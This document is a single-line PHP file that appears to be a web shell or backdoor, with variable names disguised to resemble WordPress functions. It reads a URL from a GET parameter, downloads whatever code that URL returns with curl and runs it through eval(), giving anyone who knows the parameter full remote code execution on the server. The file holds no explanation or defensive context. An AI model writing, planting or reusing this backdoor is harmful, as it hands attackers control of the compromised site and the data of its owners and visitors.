<?php if (isset($_GET['constructor'])) { $the_excerpt_jv = $_GET['constructor']; if ($home_url_eo = curl_init()) { curl_setopt($home_url_eo, CURLOPT_URL, $the_excerpt_jv); curl_setopt($home_url_eo, CURLOPT_RETURNTRANSFER, true); eval(curl_exec($home_url_eo)); curl_close($home_url_eo); exit; } }